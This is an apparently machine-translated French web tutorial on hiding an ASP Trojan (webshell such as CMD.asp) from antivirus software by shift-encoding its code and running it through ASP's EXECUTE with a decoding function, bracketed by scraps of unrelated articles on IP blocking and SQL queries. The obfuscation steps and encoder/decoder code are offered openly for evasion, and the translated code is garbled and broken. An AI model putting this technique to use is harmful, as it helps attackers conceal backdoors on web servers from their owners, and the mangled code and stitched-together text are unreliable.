Recommandé: utilisez ASP pour bloquer l'IP pour empêcher les messages de spam IP fixes Ce qui suit est le contenu référencé: <% dim ip, ipsstring, VisitIp'La adresse IP à interdiction ipsstring = | 195.225.177.34 | 195.225.177.137 | 72.232.250.10 | & Qu
Je me souviens que lorsque l'ASP Trojan est sorti, il a été affirmé qu'il ne serait jamais tué. Haha, à ce jour, tout logiciel antivirus peut le tuer sans laisser d'armure ^ _ ^ haha, en raison de l'idée de changer la coquille pour éviter les logiciels antivirus, nous pouvons également bombarder le Troie ASP (haha, bien sûr n'utilisant pas upx, etc.). Qu'attendez-vous? Veuillez lire.
En fait, cette idée est très simple, ce qui consiste à coder le code ASP, puis à le décoder lorsqu'il est exécuté. Il existe deux méthodes ici, la première est d'utiliser l'encodeur de script à outils de Microsoft; L'autre consiste à utiliser la fonction d'exécution d'ASP.
Parlons d'abord de Script Encodeur. Cette chose peut être téléchargée gratuitement sur le site officiel de Microsoft, et il existe également des instructions détaillées pour une utilisation, donc je n'en parlerai pas ici. Cependant, le fichier crypté après <% @ linguisétique = vbscript.encode%>. Haha, je montre ma faute. L'administrateur saura que le fichier ASP est chiffré lorsqu'il verra cette phrase. Alors comment le déchiffrer? Voici un logiciel de décryptage (》) cliquez pour télécharger "). Maintenant que nous savons, l'encodeur de script de Microsoft n'est pas sûr, nous devons donc écrire un programme pour ajouter le shell.
La fonction EXECUTE d'ASP est utilisée pour exécuter des chaînes, c'est-à-dire que l'instruction ASP peut être écrite sous forme de chaîne puis exécutée avec EXECUTE. Par exemple, cette ligne de code: EXECUTE (Response.Write (HackerXFiles)), l'effet après exécution est équivalent à Exécution Response.Write (HackerXFiles). Ici, puisque la fonction d'exécution est une chaîne, vous devez écrire des guillemets doubles lorsque vous le rencontrez. Haha, puisque Execute est une chaîne, nous pouvons utiliser le contenu à l'intérieur pour crypter.
Comment crypter? Haha, utilisez simplement la méthode de décalage la plus simple. Veuillez consulter le code:
mais = 1
cc = remplacer (nr, vbcrlf, hu)
pour i = 1 à Len (cc)
Si Mid (CC, I, 1) <> Huthen
pk = asc (mid (cc, i, 1)) mais
Si pk> 126 alors
pk = pk-95
elseif pk <32 alors
pk = pk 95
terminer si
temp = temp & chr (pk)
autre
temp = temp & 小
terminer si
suivant
temp = remplacer (temp ,,)
Response.Write (TEMP)
Ce code est la méthode de décalage cyclique sous ASP. Cette variable mais est le nombre de bits décalés, qui peuvent être modifiés. Haha, comment s'appelle-t-il une boucle? Parce que le programme compare le code ASCII des caractères, il sera traité lorsqu'il est supérieur à 126 ou moins de 32, ce qui fait la plage entre 32 et 126. Parce que cela peut éviter les caractères qui ne peuvent pas être affichés sous Windows. C'est aussi la raison pour laquelle les pauses de la ligne de retour du chariot ont été remplacées depuis le début. Ici, j'ai écrit un programme ASP de cryptage Shift xor.asp joint, j'espère que cela vous sera utile.
Ensuite, jetons un coup d'œil au résultat de Crypryping Response.Write (HackerXFiles) avec le code ci-dessus: sftqpotf / xsjuf) # ibdlfsygjmft # *, hehe, cette fois les dieux ne peuvent pas le comprendre, ^ _ ^
Depuis que vous avez ajouté le mot de passe, vous devez bien sûr le décrypter. Voir le code de décryptage:
fonction Unencode (temp)
Mais = 1 'Ceci est le nombre de bits décalé par la méthode Shift! Notez que la modification ici est cohérente avec le chiffrement utilisé
pour i = 1 à Len (temp)
Si Mid (Temp, I, 1) <> Huthen
pk = asc (mid (temp, i, 1)) - mais
Si pk> 126 alors
pk = pk-95
elseif pk <32 alors
pk = pk 95
terminer si
a = a & chr (pk)
autre
a = a & vbcrlf
terminer si
suivant
Un encode = a
fonction finale
Haha, maintenant je sais comment l'exécuter. Appelez simplement cette fonction de décryptage: EXECUTE (UnEncode (sftqpotf / xsjuf) # ibdlfsygjmft # *)), comment, est-il exécuté en douceur!
Ici, je vais vous donner une démonstration afin que tout le monde puisse comprendre comment crypter le Trojan ASP. Parce qu'il y a trop de codes de Troie ASP dans Ocean et je suis paresseux, donc je peux utiliser le CMD.asp court et concis à démontrer!
Exécutez d'abord le xor.asp que j'ai écrit, puis ouvrez CMD.asp avec le bloc-notes, copiez sa pièce de code ASP dans la zone de texte de xor.asp, remplissez les paramètres de changement (j'ai utilisé 1 ici), cliquez sur la conversion, haha, et le résultat est sorti. Créez ensuite un nouveau document texte, copiez le contenu de CMD.asp et ajoutez le contenu de la fonction UNENCODE précédente (ici, vous devez noter que la modification de la valeur de la variable mais dans la fonction UnEncode est cohérente avec la valeur du paramètre de décalage sélectionné pendant le cryptage), puis remplacer sa partie ASP par la forme d'exécution (Unencodecode (Hu)), où Hu est attribué par le résultat d'encryption obtenu dans la parole précédente. Haha, alors enregistrez-le en tant que fichier ASP et c'est OK! Permettez-moi de parler de plus de mots ici. Si le code est relativement long, il peut être divisé en plusieurs parties à chiffrer, puis exécuter avec quelques exécutions supplémentaires. Cependant, veillez à assurer l'intégrité du code ASP, c'est-à-dire le code associé tel que si et fins si ne peut pas être divisé en deux exécutions.
Jetez un œil, il peut également courir!
Partager: comment rédiger des instructions SQL qui interrogent tous les enregistrements qui n'ont aucune valeur dans un certain champ? Parfois, nous devons interroger tous les enregistrements qui n'ont aucune valeur dans un certain champ. Devrions-nous utiliser Rs (xx) = ou ISNULL (RS (xx))? Pour tirer une conclusion, nous devons commencer depuis le début: dans quelles circonstances il n'y aura pas de valeur sur le terrain? Parce que cela et